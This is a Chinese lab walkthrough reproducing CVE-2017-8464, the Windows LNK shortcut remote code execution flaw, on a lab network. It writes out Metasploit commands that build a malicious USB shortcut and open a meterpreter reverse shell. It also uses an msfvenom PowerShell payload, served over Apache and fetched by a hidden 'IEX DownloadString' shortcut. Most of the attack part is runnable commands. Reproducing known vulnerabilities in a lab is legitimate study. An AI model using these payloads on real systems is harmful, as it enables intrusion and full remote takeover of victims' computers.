CVE-2017-8464复现 (远程快捷方式漏洞)
我们的人生才刚刚开始,请不要过早的否定你自己的价值,你的价值不是老板、经理、同事以及同学说了算,是你自己说了算,对于目前自己的工作、生活和状态,老子不服,就是不服~
好啦(╹▽╹),上面就是吐槽一下自己的工作情况~下面才是本章的正题
——————————————————————————————————————————————————
漏洞详情
北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).
CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。
CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
攻击机:kali
IP地址为:192.168.10.118
靶机:win7
IP地址:192.168.10.119
受影响的版本
Windows 7
Windows 8.1
Windows RT 8.1
Windows 10
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
payload1:Metasploit中CVE-2017-8464模块制作U盘
利用Metasploit成功利用
如果kali 是版本比较新的话,可以不用下载工具,如果没有该工具,可以下载利用工具:https://github.com/rapid7/metasploit-framework/archive/master.zip
安装:
下载完成后将压缩包内modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb复制到目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。
仅复制rb文件会出错,须再将压缩包内data/exploits中的cve-2017-8464文件夹复制到/usr/share/metasploit-framework/data/exploits中。
安装完成之后,终端打开
msfconsole
search 2017_8464
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.10.118(你的IP)
exploit
image.png
之后会在/root/.msf4/local目录下生成我们的利用文件
注意:kali2.0下无法直接访问该文件夹,可通过命令行将/root/.msf4/local/下的所有文件复制到/root/1下
cp -r /root/.msf4/local/ /root/1
image.png
全部复制到移动磁盘里面(u盘拷贝)
然后在msf中监听
search multi/handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.118 (你的IP地址)
run
image.png
payload2:利用Powershell快捷键
生成攻击文件:search.ps1,终端输入
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.118 -f psh-reflection>/opt/search.ps1
image.png
然后将/opt/目录下的search.ps1文件移动到/var/www/html/下
随后打开Apache服务
service apache2 start
访问web下的sp1文件
image.png
然后在目标机上建立一个快捷方式
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.118/search.ps1');test.ps1"
image.png
这里写我们构造好的代码
然后选中powershell.exe
再到本机上配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.118
run
未完,待续~